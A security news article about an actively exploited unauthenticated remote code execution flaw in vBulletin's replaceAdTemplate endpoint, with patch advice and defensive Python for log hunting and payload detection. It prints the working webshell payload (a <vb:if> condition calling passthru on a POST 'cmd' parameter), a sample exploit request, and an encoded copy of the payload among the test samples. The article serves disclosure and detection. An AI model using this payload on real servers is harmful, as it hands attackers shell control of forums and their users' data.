A newly disclosed and actively exploited unauthenticated Remote Code Execution (RCE) vulnerability in vBulletin forum software threatens thousands of online communities worldwide.
The flaw, impacting vBulletin versions 5.0.0 through 6.0.3, allows attackers to execute arbitrary commands on vulnerable servers, posing a severe risk to data integrity and site control.
The vulnerability, recently uncovered by the security research group Karma(In)Security, stems from insecure handling in the ajax/api/ad/replaceAdTemplate endpoint, which is reachable without authentication and accepts template markup. vBulletin evaluates the condition of a <vb:if> template conditional as PHP; by writing the function name as a quoted string, the attacker slips past the template engine's check for disallowed PHP functions, and raw PHP runs on the server. The payload observed in live attacks is a single conditional:
<vb:if condition='"passthru"($_POST["cmd"])'></vb:if>
Once a crafted HTTP POST request has stored this conditional, it acts as a backdoor: every later request that reaches it hands the value of the cmd POST parameter to passthru(), which runs it as a shell command and returns the output, giving the attacker a remote shell on the server.
Sample malicious POST request (the capture shows only the cmd parameter that drives the backdoor):

POST /ajax/api/ad/replaceAdTemplate HTTP/1.1
Host: vulnerable-forum.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

cmd=whoami
On May 26, 2025, honeypot systems detected several exploitation attempts from a Polish IP address (195.3.221.137), confirming real-world attacks.
Evidence suggests attackers are using the proof-of-concept code released by researchers, rather than automated attack frameworks.
The vulnerability has drawn attention in the security community due to the existence of a Nuclei template and increasing scan activity observed in industry logs, such as those tracked by the SANS Internet Storm Center. Despite the patch being available for over a year (in versions 6.0.3 Patch Level 1, 6.0.2 Patch Level 1, 6.0.1 Patch Level 1, and 5.7.5 Patch Level 3), many forums remain dangerously exposed.
While the CVE assignments (CVE-2025-48827 and CVE-2025-48828) are pending public documentation, the implications are clear: admins must update vBulletin immediately to at least 6.0.3 PL1 (or the corresponding patch level for their branch) or, ideally, the current 6.1.1 release. Delay in patching risks complete server compromise.
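As an added hunting example (not code from the article or from Karma(In)Security), the Python below pulls every request to the replaceAdTemplate endpoint out of combined-format access logs and counts them per source address, and checks a captured POST body for a <vb:if> condition that calls a PHP function through a quoted string, the shape of the payload above; it generalizes past passthru to any quoted function name. The log lines, the request bodies and the "template" parameter name are constructed for the example. The body check only applies where request bodies are captured (a WAF, reverse proxy or honeypot), since access logs carry only the request line.

```python
"""Hunt for abuse of vBulletin's ajax/api/ad/replaceAdTemplate endpoint.

Two checks: (1) pull every request to the endpoint out of combined-format
access logs and count them per client address; (2) test a captured POST
body for a <vb:if> conditional that calls a PHP function through a quoted
string, the shape of the payload seen in the wild. All sample log lines,
bodies and parameter names below are constructed for this example.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Endpoint named in the advisory; the forum may live under any path prefix.
ENDPOINT_RE = re.compile(r"/ajax/api/ad/replaceAdTemplate(?=$|[?/])", re.IGNORECASE)

# Apache/nginx "combined" format; referrer and user agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referrer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# <vb:if condition='...'> whose condition calls a function written as a quoted
# string, e.g. "passthru"(...). A quoted name directly followed by "(" is PHP's
# variable-function syntax and does not occur in normal template conditions.
TEMPLATE_INJECT_RE = re.compile(
    r"<vb:if\s+condition=['\"][^>]*?[\"'][A-Za-z_][A-Za-z0-9_]*[\"']\s*\(",
    re.IGNORECASE,
)


def parse_log_line(line: str):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_endpoint_hits(lines):
    """All parsed requests whose path is the replaceAdTemplate endpoint, any method."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec and ENDPOINT_RE.search(rec["path"]):
            hits.append(rec)
    return hits


def source_counts(hits):
    """Number of requests to the endpoint per client address."""
    return Counter(h["ip"] for h in hits)


def is_template_injection(body: str) -> bool:
    """True if a (possibly URL-encoded) POST body carries a quoted-function vb:if condition."""
    return TEMPLATE_INJECT_RE.search(unquote_plus(body)) is not None


# Constructed access-log lines using RFC 5737 documentation addresses, not a real capture.
SAMPLE_LOG = """\
203.0.113.10 - - [26/May/2025:08:14:02 +0000] "GET /forum/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [26/May/2025:08:15:40 +0000] "POST /forum/ajax/api/ad/replaceAdTemplate HTTP/1.1" 200 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.7 - - [26/May/2025:08:15:41 +0000] "POST /forum/ajax/api/ad/replaceAdTemplate HTTP/1.1" 200 58 "-" "python-requests/2.31"
203.0.113.10 - - [26/May/2025:08:16:03 +0000] "GET /forum/forum/general-discussion HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

# Constructed POST bodies; the "template" parameter name is assumed for illustration.
SAMPLE_BODIES = {
    "exploit": "template=%3Cvb%3Aif+condition%3D%27%22passthru%22%28%24_POST%5B%22cmd%22%5D%29%27%3E%3C%2Fvb%3Aif%3E",
    "benign": "template=<vb:if condition='$bbuserinfo.userid == 1'>staff</vb:if>",
    "stage2": "cmd=whoami",
}

if __name__ == "__main__":
    hits = find_endpoint_hits(SAMPLE_LOG.splitlines())
    for ip, n in source_counts(hits).most_common():
        print(f"{ip}: {n} request(s) to replaceAdTemplate")
    for h in hits:
        print(f"  {h['time']} {h['method']} {h['path']} {h['status']} ua={h['ua']!r}")
    for name, body in SAMPLE_BODIES.items():
        print(f"body[{name}] template injection: {is_template_injection(body)}")
```

Any hit on the endpoint from an address that is not a known administrator is worth triage on its own, since the endpoint exists for ad management and sees little legitimate traffic; the body check adds the specific payload shape once a proxy or WAF capture is available.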